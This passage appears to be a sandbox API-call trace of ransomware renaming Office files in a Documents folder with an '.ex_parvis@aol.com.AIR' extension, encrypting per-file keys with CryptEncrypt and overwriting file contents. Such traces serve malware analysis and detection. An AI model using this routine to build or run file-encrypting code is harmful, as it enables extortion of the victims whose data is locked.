	[0099.931] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lEYWDuoabD0KRzrS98VU.docx", dwFileAttributes=0x80) returned 1
	[0099.932] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lEYWDuoabD0KRzrS98VU.docx") returned 66
	[0099.932] GetProcessHeap () returned 0x540000
	[0099.932] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xea) returned 0x598b60
	[0099.932] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lEYWDuoabD0KRzrS98VU.docx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lEYWDuoabD0KRzrS98VU.docx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lEYWDuoabD0KRzrS98VU.docx"
	[0099.932] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lEYWDuoabD0KRzrS98VU.docx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lEYWDuoabD0KRzrS98VU.docx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lEYWDuoabD0KRzrS98VU.docx.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.932] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lEYWDuoabD0KRzrS98VU.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\leywduoabd0krzrs98vu.docx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lEYWDuoabD0KRzrS98VU.docx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\leywduoabd0krzrs98vu.docx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.935] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lEYWDuoabD0KRzrS98VU.docx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\leywduoabd0krzrs98vu.docx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0099.935] GetProcessHeap () returned 0x540000
	[0099.935] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0099.935] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=60233) returned 1
	[0099.936] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xeb49
	[0099.936] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.936] GetProcessHeap () returned 0x540000
	[0099.936] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0099.936] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.936] WriteFile (in: hFile=0x380, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.937] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.937] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.937] ReadFile (in: hFile=0x380, lpBuffer=0x601bb8, nNumberOfBytesToRead=0xeb49, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x601bb8*, lpNumberOfBytesRead=0x3a1f778*=0xeb49, lpOverlapped=0x0) returned 1
	[0099.938] SetFilePointer (in: hFile=0x380, lDistanceToMove=-60233, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.938] WriteFile (in: hFile=0x380, lpBuffer=0x610710*, nNumberOfBytesToWrite=0xeb49, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x610710*, lpNumberOfBytesWritten=0x3a1f778*=0xeb49, lpOverlapped=0x0) returned 1
	[0099.939] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0099.939] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0099.939] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\K1ruro46jVUR38fANX.ots", dwFileAttributes=0x80) returned 1
	[0099.939] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\K1ruro46jVUR38fANX.ots") returned 63
	[0099.939] GetProcessHeap () returned 0x540000
	[0099.939] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe4) returned 0x598b60
	[0099.939] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\K1ruro46jVUR38fANX.ots" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\K1ruro46jVUR38fANX.ots") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\K1ruro46jVUR38fANX.ots"
	[0099.939] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\K1ruro46jVUR38fANX.ots", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\K1ruro46jVUR38fANX.ots.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\K1ruro46jVUR38fANX.ots.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.939] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\K1ruro46jVUR38fANX.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\k1ruro46jvur38fanx.ots"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\K1ruro46jVUR38fANX.ots.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\k1ruro46jvur38fanx.ots.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.941] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\K1ruro46jVUR38fANX.ots.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\k1ruro46jvur38fanx.ots.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0099.942] GetProcessHeap () returned 0x540000
	[0099.942] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0099.942] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=3234) returned 1
	[0099.942] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xca2
	[0099.942] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.942] GetProcessHeap () returned 0x540000
	[0099.942] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0099.942] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.942] WriteFile (in: hFile=0x380, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.943] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.943] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.943] ReadFile (in: hFile=0x380, lpBuffer=0x3a20048, nNumberOfBytesToRead=0xca2, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20048*, lpNumberOfBytesRead=0x3a1f778*=0xca2, lpOverlapped=0x0) returned 1
	[0099.943] SetFilePointer (in: hFile=0x380, lDistanceToMove=-3234, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.943] WriteFile (in: hFile=0x380, lpBuffer=0x601bb8*, nNumberOfBytesToWrite=0xca2, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x601bb8*, lpNumberOfBytesWritten=0x3a1f778*=0xca2, lpOverlapped=0x0) returned 1
	[0099.943] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0099.943] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0099.943] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JgNM o 5a 6dul.docx", dwFileAttributes=0x80) returned 1
	[0099.944] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JgNM o 5a 6dul.docx") returned 60
	[0099.944] GetProcessHeap () returned 0x540000
	[0099.944] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xde) returned 0x598b60
	[0099.944] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JgNM o 5a 6dul.docx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JgNM o 5a 6dul.docx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JgNM o 5a 6dul.docx"
	[0099.944] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JgNM o 5a 6dul.docx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JgNM o 5a 6dul.docx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JgNM o 5a 6dul.docx.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.944] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JgNM o 5a 6dul.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jgnm o 5a 6dul.docx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JgNM o 5a 6dul.docx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jgnm o 5a 6dul.docx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.946] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JgNM o 5a 6dul.docx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jgnm o 5a 6dul.docx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0099.946] GetProcessHeap () returned 0x540000
	[0099.946] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0099.946] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=74262) returned 1
	[0099.946] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x12216
	[0099.947] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.947] GetProcessHeap () returned 0x540000
	[0099.947] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0099.947] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.947] WriteFile (in: hFile=0x380, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.948] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.948] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.949] ReadFile (in: hFile=0x380, lpBuffer=0x601bb8, nNumberOfBytesToRead=0x12216, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x601bb8*, lpNumberOfBytesRead=0x3a1f778*=0x12216, lpOverlapped=0x0) returned 1
	[0099.950] SetFilePointer (in: hFile=0x380, lDistanceToMove=-74262, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.950] WriteFile (in: hFile=0x380, lpBuffer=0x3790048*, nNumberOfBytesToWrite=0x12216, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3790048*, lpNumberOfBytesWritten=0x3a1f778*=0x12216, lpOverlapped=0x0) returned 1
	[0099.950] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0099.950] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0099.950] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JeM6Ly.xlsx", dwFileAttributes=0x80) returned 1
	[0099.951] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JeM6Ly.xlsx") returned 52
	[0099.951] GetProcessHeap () returned 0x540000
	[0099.951] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xce) returned 0x59d258
	[0099.951] lstrcpyW (in: lpString1=0x59d258, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JeM6Ly.xlsx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JeM6Ly.xlsx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JeM6Ly.xlsx"
	[0099.951] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JeM6Ly.xlsx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JeM6Ly.xlsx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JeM6Ly.xlsx.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.951] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JeM6Ly.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jem6ly.xlsx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JeM6Ly.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jem6ly.xlsx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.953] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JeM6Ly.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jem6ly.xlsx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0099.953] GetProcessHeap () returned 0x540000
	[0099.953] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x59d258 | out: hHeap=0x540000) returned 1
	[0099.953] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=100980) returned 1
	[0099.953] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x18a74
	[0099.953] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.953] GetProcessHeap () returned 0x540000
	[0099.953] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0099.953] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.954] WriteFile (in: hFile=0x380, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.954] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.954] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.955] ReadFile (in: hFile=0x380, lpBuffer=0x601bb8, nNumberOfBytesToRead=0x18a74, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x601bb8*, lpNumberOfBytesRead=0x3a1f778*=0x18a74, lpOverlapped=0x0) returned 1
	[0099.956] SetFilePointer (in: hFile=0x380, lDistanceToMove=-100980, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.956] WriteFile (in: hFile=0x380, lpBuffer=0x3790048*, nNumberOfBytesToWrite=0x18a74, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3790048*, lpNumberOfBytesWritten=0x3a1f778*=0x18a74, lpOverlapped=0x0) returned 1
	[0099.956] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0099.956] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0099.956] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iPhc2hVu2fGA.pptx", dwFileAttributes=0x80) returned 1
	[0099.956] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iPhc2hVu2fGA.pptx") returned 58
	[0099.956] GetProcessHeap () returned 0x540000
	[0099.956] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xda) returned 0x598b60
	[0099.956] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iPhc2hVu2fGA.pptx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iPhc2hVu2fGA.pptx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iPhc2hVu2fGA.pptx"
	[0099.956] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iPhc2hVu2fGA.pptx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iPhc2hVu2fGA.pptx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iPhc2hVu2fGA.pptx.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.957] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iPhc2hVu2fGA.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\iphc2hvu2fga.pptx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iPhc2hVu2fGA.pptx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\iphc2hvu2fga.pptx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.959] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iPhc2hVu2fGA.pptx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\iphc2hvu2fga.pptx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0099.959] GetProcessHeap () returned 0x540000
	[0099.959] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0099.959] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=65211) returned 1
	[0099.959] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xfebb
	[0099.959] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.959] GetProcessHeap () returned 0x540000
	[0099.959] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0099.959] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.959] WriteFile (in: hFile=0x380, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.960] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.960] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.960] ReadFile (in: hFile=0x380, lpBuffer=0x601bb8, nNumberOfBytesToRead=0xfebb, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x601bb8*, lpNumberOfBytesRead=0x3a1f778*=0xfebb, lpOverlapped=0x0) returned 1
	[0099.961] SetFilePointer (in: hFile=0x380, lDistanceToMove=-65211, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.961] WriteFile (in: hFile=0x380, lpBuffer=0x611a80*, nNumberOfBytesToWrite=0xfebb, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x611a80*, lpNumberOfBytesWritten=0x3a1f778*=0xfebb, lpOverlapped=0x0) returned 1
	[0099.962] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0099.962] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0099.962] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H 8 Lqx.ots", dwFileAttributes=0x80) returned 1
	[0099.963] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H 8 Lqx.ots") returned 52
	[0099.963] GetProcessHeap () returned 0x540000
	[0099.963] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xce) returned 0x59d258
	[0099.963] lstrcpyW (in: lpString1=0x59d258, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H 8 Lqx.ots" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H 8 Lqx.ots") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H 8 Lqx.ots"
